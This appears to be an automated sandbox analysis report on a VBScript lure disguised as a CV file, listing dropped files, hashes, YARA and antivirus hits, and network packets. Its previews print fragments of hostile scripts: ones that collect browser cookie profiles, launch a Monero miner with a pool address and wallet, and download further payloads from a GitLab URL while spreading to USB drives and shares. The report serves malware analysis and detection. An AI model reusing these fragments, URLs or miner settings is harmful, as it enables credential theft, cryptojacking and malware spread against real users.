                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:S11ynIPsj6sBu8eDJc+SkXe8UmV7Mrra8kyQWmqdJW0bx:SAIPsj6sBCdskXCmVo3kyQLeRbx
                                                                                                                  MD5:D418273816199870DE1A16C99702A6CF
                                                                                                                  SHA1:92549DDA7BBCAC5EB3CC17C8FF3618C444F82AD3
                                                                                                                  SHA-256:5ACF2688DBC6E2078D19AD7580BC06C61BF4DA9C81731738659E2A4A2C045F0B
                                                                                                                  SHA-512:34400D0114E9300AAC9C4B0F858376B19FF6F1A00465C424CF3CEF55200204641ABE2F413CE7CA047A49CB981E31EF6C532CA216CB8B28AE362DA251A3E55AFC
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4..4..4..;...4..;...4......4.7...4..4.5.....4....4....4....4.Rich.4.................PE..L.....Jc.................P...0.......Z.......`....@.............................................................................X....`..."..........................................................................................................UPX0....................................UPX1.....P.......L..................@....rsrc....0...`...&...P..............@..............................................................................................................................................................................................................................................................................................................................................................................................3.95.UPX!....

                                                                                                                  C:\Users\Public\WindowsUpdate\mozilla.vbs

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\Public\7g.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4428
                                                                                                                  Entropy (8bit):5.0675742940767075
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:hGzQkmSN/YdJpJOwmX+n4dWzqG5/heHapYHZ7neI+:hImc/aLR5/heHhneI+
                                                                                                                  MD5:940BECD4A93648C673BF2D62EA2EA381
                                                                                                                  SHA1:3E5C32C433F2D2178053584A9607E833ADD4F8C8
                                                                                                                  SHA-256:DE5484BEA391CF374E60A7492C7BCD9C12FA8E3185A1A0C1EBC0155701C5AFA5
                                                                                                                  SHA-512:3B56FB492B19310F5DD33A989E979CE728D587755C78C65843C604EC23953D51BF5F532BAEE656F60374A372C37F2806888B722DDC65290A81478E3F83658842
                                                                                                                  Malicious:true
                                                                                                                  Preview:dim profiles(100)..cpt_profile=0....set objFso = CreateObject("Scripting.FileSystemObject")..Set oShell = CreateObject( "WScript.Shell" )..appdata=oShell.ExpandEnvironmentStrings("%appdata%") ..TraverseFolders appdata....Sub ZipFolder (sFolder,zipFile).. on error resume next.. With CreateObject("Scripting.FileSystemObject").. zipFile = .GetAbsolutePathName(zipFile).. sFolder = .GetAbsolutePathName(sFolder).... With .CreateTextFile(zipFile, True).. .Write Chr(80) & Chr(75) & Chr(5) & Chr(6) & String(18, chr(0)).. End With.. End With.... With CreateObject("Shell.Application").. .NameSpace(zipFile).CopyHere .NameSpace(sFolder).Items.. Do Until .NameSpace(zipFile).Items.Count = _.. .NameSpace(sFolder).Items.Count.. WScript.Sleep 1000 .. Loop.. End With....End Sub....Function TraverseFolders(f)..set fldr = objFso.GetFolder(f)..if objFso.fileexists(f+"\cookies.sqlite") and objFso.fileexists(

                                                                                                                  C:\Users\Public\WindowsUpdate\mservice.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\Public\7g.exe
                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4770304
                                                                                                                  Entropy (8bit):6.649403136807024
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:98304:4XCVqZY5SVIhbh1A8K/drFfV6I8NXpBtkuzDS8VvazdNBi/:VVqJkI89pBTDS8NeNi/
                                                                                                                  MD5:CFC0000B993A31C11EF58AC53837E4E1
                                                                                                                  SHA1:750752B9C20C6BAC25C172FC5A0645CC7D631457
                                                                                                                  SHA-256:47D70838CBEDC8B0E0634E51BDE8A72035922BDDC1177CC9210FA0ADB967D6A2
                                                                                                                  SHA-512:BF03704F5E363940328112825976B78BE50E4A8BE2A64D50EB71E1EC016946F9D6DD256ECD2B87105AE45614982351B27AE99A53284321C3EBBC16CE316B960E
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: Joe Security
                                                                                                                  • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: ditekSHen
                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: Florian Roth
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                  Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........=...\...\...\...7...\...7...\...3{..\...)...\...)...\...)...\...7...\...)...\...7...\...\...]...)...^...)...\...)...\...)y..\...\...\...)...\..Rich.\..........................PE..d....dc..........".......4...>.......0........@............................. s......jI...`.................................................|tE.......r......@p.<.............r.h{..@.B.......................B.(...`.B.8............ 4..............................text.....4.......4................. ..`.rdata...u... 4..v....4.............@..@.data...4.*...E.......E.............@....pdata..<....@p......"F.............@..@_RANDOMXV.... r.......G.............@..`_TEXT_CN.&...0r..(....H.............@..`_TEXT_CN.....`r......4H.............@..`_RDATA........r......FH.............@..@.rsrc.........r......HH.............@..@.reloc..h{....r..|...NH.............@..B................................

                                                                                                                  C:\Users\Public\WindowsUpdate\mservice.vbs

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\Public\7g.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1568
                                                                                                                  Entropy (8bit):5.533375448529494
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:bCqIXN2pAMTEgPFtM41PKk+EfYg+1TK/AFhHqITUzF+Z+5H0TOWq/AnhskYn9DWo:HQgPFtMLkfQVNE2KIqF+I5HwkgzYb
                                                                                                                  MD5:5CF1145271785A3EA252129F0728ED7B
                                                                                                                  SHA1:12FA9C83FD793E51A25723BE91E66EAC7199EE6B
                                                                                                                  SHA-256:C20D2A220F7429FA128671A5E2187B5C52821BEFDD48379E44788820FAB89E96
                                                                                                                  SHA-512:B27F7489E7330D9910BE5A2E401C9B0B7A8371CCBD2EED857F04C2F5845AAA9CA65238452AD59680750DD5A7FA7C3BF37125CED2579431C63DED9344744FD7DD
                                                                                                                  Malicious:true
                                                                                                                  Preview:Function LPad (str, pad, length).. LPad = String(length - Len(str), pad) & str..End Function....set L5ofL5 = CreateObject("Scripting.FileSystemObject")..if not L5ofL5.FileExists("c:\users\public\log.dat") then ..set f = L5ofL5.CreateTextFile("c:\users\public\log.dat",True)..f.Write LPad(day(now), "0", 2)+LPad(month(now), "0", 2)+"-"+LPad(hour(now), "0", 2)+"h"+LPad(minute(now), "0", 2)+"m"..f.close..end if..set f2 = L5ofL5.OpenTextFile("c:\users\public\log.dat")..d = f2.ReadLine..f2.Close....Dim objWMIService, objComputer, colComputer ..Set objWMIService = GetObject("winmgmts:"& "{impersonationLevel=impersonate}!\\.\root\cimv2") ..Set colComputer = objWMIService.ExecQuery("Select * from Win32_ComputerSystem") ..For Each objComputer in colComputer ..ram = objComputer.TotalPhysicalMemory/(1024*1024)..Next ..if ram > 4096 then ..mode="auto"..Else..mode="light"..end if....command0 = """%public%\windowsupdate\mservice.exe"" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8h

                                                                                                                  C:\Users\Public\WindowsUpdate\ps.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\Public\7g.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):402944
                                                                                                                  Entropy (8bit):6.666814366272581
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:QNV8uoDRSdm3v93UFlssFHgkU9KvKUXr/BAO9N/oXrsAteTQokizYu:eSDRSm3vrugB9KvKk9RO8k3u
                                                                                                                  MD5:2024EA60DA870A221DB260482117258B
                                                                                                                  SHA1:716554DC580A82CC17A1035ADD302C0766590964
                                                                                                                  SHA-256:53043BD27F47DBBE3E5AC691D8A586AB56A33F734356BE9B8E49C7E975241A56
                                                                                                                  SHA-512:FFCD4436B80169BA18DB5B7C818C5DA71661798963C0A5F5FBAC99A6974A7729D38871E52BC36C766824DD54F2C8FA5711415EC45799DB65C11293D8B829693B
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\Public\WindowsUpdate\ps.exe, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 81%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................9.......9............... ......................;.......;.......;......Rich............PE..L....hy`.....................P......,i............@..................................................................................@..................................................................................p............................text............................... ..`.rdata..............................@..@.data..............................@....rsrc........@......................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\Public\WindowsUpdate\sarmat.vbs

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\Public\7g.exe
                                                                                                                  File Type:assembler source, ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2559
                                                                                                                  Entropy (8bit):5.054358680199897
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:PbR2Hk8fSRgDmgTzlREzXacPeIpLVdxpDnBmKhRhFI/nwvvZiOrA7BehBqnHOW+x:PbR2HtfUoxflREzXacGYzxBWCRpXMunx
                                                                                                                  MD5:08AD7921EC11078118F3AEB89E177C3F
                                                                                                                  SHA1:633197EE0570BA80CFE2358BBC483B64D84E838B
                                                                                                                  SHA-256:E66DA8042513B237CE1BE98A5291C61ADE2A8EBDB87B6AEB4EB9E200B38AFC53
                                                                                                                  SHA-512:009FE96D10FBCD751C41B7738D7E7C2748DF0F0F4C6A206C973E19D93116DE5D4906568236EC904B74302D12467126B383F3980E3351DCCD6F0232B211ABD061
                                                                                                                  Malicious:false
                                                                                                                  Preview:.sub L5dwlL5(L5uL5, L5sL5).dim L5xL5: Set L5xL5 = createobject("Microsoft.XMLHTTP").dim L5bL5: Set L5bL5 = createobject("Adodb.Stream").L5xL5.Open "GET", L5uL5, False.L5xL5.Send..with L5bL5. .type = 1 '//binary. .open. .write L5xL5.responseBody. .savetofile L5sL5, 2 '//overwrite.end with.end sub..url = "https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=false"...on error resume next..sub listDrives.dim drives(100).dim labels(100).i=0.Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")..Set colDisks = objWMIService.ExecQuery ("Select * from Win32_LogicalDisk where DriveType=2 or DriveType=4").For Each objDisk in colDisks. letter = objDisk.DeviceID..if fso.GetDrive(letter).isReady then...drives(i)=letter. labels(i)=fso.GetDrive(letter).volumename...i=i+1..end if.Next.Set colShares = objWMIService.ExecQuery("Select * from Win32_Share where not name like '%$%'")..For each objShare in colShares.sharedfolder

                                                                                                                  C:\Users\Public\gmail.7z

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\wscript.exe
                                                                                                                  File Type:7-zip archive data, version 0.4
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1960608
                                                                                                                  Entropy (8bit):7.999903958520937
                                                                                                                  Encrypted:true
                                                                                                                  SSDEEP:49152:cUXIV4OGLOd2YHtcmQL/IEP2g3Pg/1oVkZkS:cUXI9H+7VVrkeS
                                                                                                                  MD5:D674B5A2A7159B838ADE554C35E15E1D
                                                                                                                  SHA1:EDE9027E85C6FE270FA99F6C8597DDC24193C470
                                                                                                                  SHA-256:7F5ED3342BCD240C07500B3147C8CAEA27264A936250A29AE4C85BAAE47C4906
                                                                                                                  SHA-512:57FB778CC5A0252DC5AA486A424305AAC36E2B20F6BBC2F49C14244B23492DE290C981A56A31D08FD56956657531F767161C527F7255EA1EE5C21EAD9E68E36C
                                                                                                                  Malicious:true
                                                                                                                  Preview:7z..'...3ss.@.......@.........../..\#.|.o.<.j...M..K.y..&..x.x......|V.....6D...m@W[.......~n.....S..Ht!.m|c...3.q.c........^..Q....wg6..;q.vo.h.W../ .T.(.v...).G....N....^.P.q...EP.Z'`72f..J...$.*...w.......=.,...I.>6l..$_.......4.U.dO.p.83=...d.M..B9..%r.l.g8.m.-..r....i....9....q...D...vn..p.,.4L.I.U.......|..l._.W.\58.C......8K-..... .........5.@...r5b....L.....Fxv|..M..^....R.K..P.>.=$U..*t...5...@..|.......a.|8..i!._....'..E._,.#...B..]....S....zO...p......|]......i.S/..dphV.....~.j.7.....S...iL..:L.r2...M;.\.s....nT.4.....K<.0.H!M.FR..z.E&@..b..m....J.....n.....R.cy%.I...W32sew...T.t.R..f..Z.....+.Z..N|!....in%.S.yZ.''..{6.w.....`jt..lD^t.......\.?.......{.Q$...N.....8......Q`^..J8.3$Y...[....)Gaz....6e..._.&Ey.hx%...N%.....NM.3R=d)....wL.8...'pU..Z.....R...(.3../.FQ...T..........Hy.e .v'....K.:.....&....JBb]>..........3...v.1.~!.............$...@...R.IkU4P......tLT.\'1.......9(]....qF-........kg..L.m..X.k.7./.UW.eII..BS+....x.

                                                                                                                  C:\Users\Public\log.dat

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\wscript.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):11
                                                                                                                  Entropy (8bit):2.5503407095463886
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:EKUI:EQ
                                                                                                                  MD5:48553036A9B4D2C796CA6C758920C289
                                                                                                                  SHA1:4F1A5BD835CB0FD2255BF20FC8202F8C84F00BEE
                                                                                                                  SHA-256:8D1145E5DB0D2FE730601790B2EB1F450F09362F82A5D3072CC142CF1BB3A77F
                                                                                                                  SHA-512:A99A87B2436504FBABD9529FB22325E9E7939C9DC301A256B3B1CF27C4A2C491CD01D45DA41C0A1E73C3B9DA511561C20D40DBE231F1EDF637968D4CD2B21FF0
                                                                                                                  Malicious:false
                                                                                                                  Preview:0308-18h00m

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\7zr[1].exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\wscript.exe
                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):584704
                                                                                                                  Entropy (8bit):6.634685254929279
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:FSjMK6lrdOCdlki5Zc0EyR35ksye/X16PJz5tghj+:FSjieCd+i5s+Jks1foxz5Whj+
                                                                                                                  MD5:58FC6DE6C4E5D2FDA63565D54FEB9E75
                                                                                                                  SHA1:0586248C327D21EFB8787E8EA9F553DDC03493EC
                                                                                                                  SHA-256:72C98287B2E8F85EA7BB87834B6CE1CE7CE7F41A8C97A81B307D4D4BF900922B
                                                                                                                  SHA-512:E7373A9CAA023A22CC1F0F4369C2089A939AE40D26999AB5DCAB2C5FEB427DC9F51F96D91EF078E843301BAA5D9335161A2CF015E09E678D56E615D01C8196DF
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Aes.............~.......j...............j.......j.........B...............@.....3".......{......3"...............v..............Rich............................PE..L....\.d.................t..........F.............@.......................................@.................................$...x.... .......................0...L......................................................4............................text...Ur.......t.................. ..`.rdata...............x..............@..@.data....j..........................@....sxdata.............................@....rsrc........ ......................@..@.reloc...V...0...X..................@..B................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\gmail[1].7z

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\wscript.exe
                                                                                                                  File Type:7-zip archive data, version 0.4
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1960608
                                                                                                                  Entropy (8bit):7.999903958520937
                                                                                                                  Encrypted:true
                                                                                                                  SSDEEP:49152:cUXIV4OGLOd2YHtcmQL/IEP2g3Pg/1oVkZkS:cUXI9H+7VVrkeS
                                                                                                                  MD5:D674B5A2A7159B838ADE554C35E15E1D
                                                                                                                  SHA1:EDE9027E85C6FE270FA99F6C8597DDC24193C470
                                                                                                                  SHA-256:7F5ED3342BCD240C07500B3147C8CAEA27264A936250A29AE4C85BAAE47C4906
                                                                                                                  SHA-512:57FB778CC5A0252DC5AA486A424305AAC36E2B20F6BBC2F49C14244B23492DE290C981A56A31D08FD56956657531F767161C527F7255EA1EE5C21EAD9E68E36C
                                                                                                                  Malicious:false
                                                                                                                  Preview:7z..'...3ss.@.......@.........../..\#.|.o.<.j...M..K.y..&..x.x......|V.....6D...m@W[.......~n.....S..Ht!.m|c...3.q.c........^..Q....wg6..;q.vo.h.W../ .T.(.v...).G....N....^.P.q...EP.Z'`72f..J...$.*...w.......=.,...I.>6l..$_.......4.U.dO.p.83=...d.M..B9..%r.l.g8.m.-..r....i....9....q...D...vn..p.,.4L.I.U.......|..l._.W.\58.C......8K-..... .........5.@...r5b....L.....Fxv|..M..^....R.K..P.>.=$U..*t...5...@..|.......a.|8..i!._....'..E._,.#...B..]....S....zO...p......|]......i.S/..dphV.....~.j.7.....S...iL..:L.r2...M;.\.s....nT.4.....K<.0.H!M.FR..z.E&@..b..m....J.....n.....R.cy%.I...W32sew...T.t.R..f..Z.....+.Z..N|!....in%.S.yZ.''..{6.w.....`jt..lD^t.......\.?.......{.Q$...N.....8......Q`^..J8.3$Y...[....)Gaz....6e..._.&Ey.hx%...N%.....NM.3R=d)....wL.8...'pU..Z.....R...(.3../.FQ...T..........Hy.e .v'....K.:.....&....JBb]>..........3...v.1.~!.............$...@...R.IkU4P......tLT.\'1.......9(]....qF-........kg..L.m..X.k.7./.UW.eII..BS+....x.

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):64
                                                                                                                  Entropy (8bit):0.9260988789684415
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Nlllulb/lj:NllUb/l
                                                                                                                  MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                                                                                                  SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                                                                                                  SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                                                                                                  SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                                                                                                  Malicious:false
                                                                                                                  Preview:@...e................................................@..........

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qgx5s5ts.jon.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Preview:1

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wf2o3qap.bx5.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Preview:1

                                                                                                                  \Device\ConDrv

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\Public\7g.exe
                                                                                                                  File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):533
                                                                                                                  Entropy (8bit):5.0069680447072304
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:pRrdRwWOTjELnFsoBkk3oQv1fRAI0VtN5v:pRr/wFTjQFbBkk3oQvRRAI8tDv
                                                                                                                  MD5:6C3B1E4F43A015103C24C4D99D06D08B
                                                                                                                  SHA1:7D2756854CD8568BFB5CC310D1E33EFAE26C7321
                                                                                                                  SHA-256:AECDB47B7E75724621CB9C5FA7F705BBB3F240CAB9E9E7BF8A25E8BE63D184C4
                                                                                                                  SHA-512:D5398C8B9DE1D1372A6EC68C4076CA4ACE381F5E6B0BE12BE60F746529ED16343C553148A8D0FED29ED2FF127A77BF9C43F72E644662D89CDFC36115F37A1B17
                                                                                                                  Malicious:false
                                                                                                                  Preview:..7-Zip (r) 23.01 (x86) : Igor Pavlov : Public domain : 2023-06-20....Scanning the drive for archives:.. 0M Scan C:\Users\Public\. .1 file, 1960608 bytes (1915 KiB)....Extracting archive: C:\Users\Public\gmail.7z..--..Path = C:\Users\Public\gmail.7z..Type = 7z..Physical Size = 1960608..Headers Size = 544..Method = LZMA2:6m BCJ 7zAES..Solid = +..Blocks = 6.... 0%. . 61% 4. . 88% 5 - WinRing0x64.sys. .Everything is Ok....Files: 8..Size: 5425957..Compressed: 1960608..

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:assembler source, ASCII text, with very long lines (51556)
                                                                                                                  Entropy (8bit):0.6948473791689755
                                                                                                                  TrID:
                                                                                                                  • Visual Basic Script (13500/0) 100.00%
                                                                                                                  File name:curriculum_vitae-copie_(1).vbs
                                                                                                                  File size:221'345 bytes
                                                                                                                  MD5:9499fcf32b387ebb8fea0c9795e13e3f
                                                                                                                  SHA1:3c555461e2ded4795e4969c2d5676d34a6ef1653
                                                                                                                  SHA256:0086b0d726b7243e52d043f33e4addf1f794712192fd5131a212bd9257d147c7
                                                                                                                  SHA512:7b29e9f35dca797c65bb18057744f79938d1b8d1935689cd02e942abce03bc70728027247b6aa1b15ad2d1f1389ecfb62fe962f833c7fabf64c493571c6f5635
                                                                                                                  SSDEEP:384:qawxcF9WnEgnteO0qDxAN/5DX7Dm5H5nzlz9T1mNHyW7zM:qa39MEgteIdAN5D45nhzd1mN/zM
                                                                                                                  TLSH:C524B6CA4C809624CB47F574856F72347B52C8FAB740740ACD3660C49E6EFA5A32DADB
                                                                                                                  File Content Preview:L5m9iKMbRREUL5 = Log(8).L5NauNkjyL5 = Log(57)...L5y2SWnYPsL5 = FormatPercent(84,16).L5Sau2vNIAL5 = FormatPercent(73,76).L5J3TYperSL5 = FormatPercent(25,80)...L5d09p3qGL5 = Sin(84).L5n4czBbckoL5 = Sin(84).L5O2C3b8hL5 = Sin(58).L5X9PoS07zCL5 = CLng(71).L5n8

                                                                                                                  File Icon

                                                                                                                  Icon Hash:68d69b8f86ab9a86

                                                                                                                  Network Behavior

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Aug 3, 2023 17:59:55.486841917 CEST49699443192.168.2.749.12.202.237
                                                                                                                  Aug 3, 2023 17:59:55.486921072 CEST4434969949.12.202.237192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:55.487025023 CEST49699443192.168.2.749.12.202.237
                                                                                                                  Aug 3, 2023 17:59:55.500478029 CEST49699443192.168.2.749.12.202.237
                                                                                                                  Aug 3, 2023 17:59:55.500535011 CEST4434969949.12.202.237192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:55.559497118 CEST4434969949.12.202.237192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:55.559664011 CEST49699443192.168.2.749.12.202.237
                                                                                                                  Aug 3, 2023 17:59:55.773530960 CEST49699443192.168.2.749.12.202.237
                                                                                                                  Aug 3, 2023 17:59:55.773587942 CEST4434969949.12.202.237192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:55.774219036 CEST4434969949.12.202.237192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:55.774323940 CEST49699443192.168.2.749.12.202.237
                                                                                                                  Aug 3, 2023 17:59:55.777554035 CEST49699443192.168.2.749.12.202.237
                                                                                                                  Aug 3, 2023 17:59:55.820557117 CEST4434969949.12.202.237192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:55.820601940 CEST4434969949.12.202.237192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:55.820626020 CEST4434969949.12.202.237192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:55.820725918 CEST49699443192.168.2.749.12.202.237
                                                                                                                  Aug 3, 2023 17:59:55.820764065 CEST49699443192.168.2.749.12.202.237
                                                                                                                  Aug 3, 2023 17:59:55.820785046 CEST4434969949.12.202.237192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:55.820808887 CEST4434969949.12.202.237192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:55.820873976 CEST49699443192.168.2.749.12.202.237
                                                                                                                  Aug 3, 2023 17:59:55.821022987 CEST49699443192.168.2.749.12.202.237
                                                                                                                  Aug 3, 2023 17:59:55.842153072 CEST4434969949.12.202.237192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:55.842187881 CEST4434969949.12.202.237192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:55.842284918 CEST49699443192.168.2.749.12.202.237
                                                                                                                  Aug 3, 2023 17:59:55.842334986 CEST4434969949.12.202.237192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:55.842370033 CEST4434969949.12.202.237192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:55.842386007 CEST49699443192.168.2.749.12.202.237
                                                                                                                  Aug 3, 2023 17:59:55.842401028 CEST4434969949.12.202.237192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:55.842420101 CEST49699443192.168.2.749.12.202.237
                                                                                                                  Aug 3, 2023 17:59:55.842428923 CEST4434969949.12.202.237192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:55.842469931 CEST49699443192.168.2.749.12.202.237
                                                                                                                  Aug 3, 2023 17:59:55.842483044 CEST4434969949.12.202.237192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:55.842502117 CEST49699443192.168.2.749.12.202.237
                                                                                                                  Aug 3, 2023 17:59:55.842528105 CEST49699443192.168.2.749.12.202.237
                                                                                                                  Aug 3, 2023 17:59:55.842566013 CEST4434969949.12.202.237192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:55.842593908 CEST4434969949.12.202.237192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:55.842622042 CEST49699443192.168.2.749.12.202.237
                                                                                                                  Aug 3, 2023 17:59:55.842633963 CEST4434969949.12.202.237192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:55.842665911 CEST49699443192.168.2.749.12.202.237
                                                                                                                  Aug 3, 2023 17:59:55.842688084 CEST49699443192.168.2.749.12.202.237
                                                                                                                  Aug 3, 2023 17:59:55.864082098 CEST4434969949.12.202.237192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:55.864123106 CEST4434969949.12.202.237192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:55.864244938 CEST49699443192.168.2.749.12.202.237
                                                                                                                  Aug 3, 2023 17:59:55.864295959 CEST4434969949.12.202.237192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:55.864326954 CEST4434969949.12.202.237192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:55.864361048 CEST4434969949.12.202.237192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:55.864362955 CEST49699443192.168.2.749.12.202.237
                                                                                                                  Aug 3, 2023 17:59:55.864379883 CEST4434969949.12.202.237192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:55.864413977 CEST49699443192.168.2.749.12.202.237
                                                                                                                  Aug 3, 2023 17:59:55.864469051 CEST49699443192.168.2.749.12.202.237
                                                                                                                  Aug 3, 2023 17:59:55.865353107 CEST4434969949.12.202.237192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:55.865384102 CEST4434969949.12.202.237192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:55.865456104 CEST4434969949.12.202.237192.168.2.7
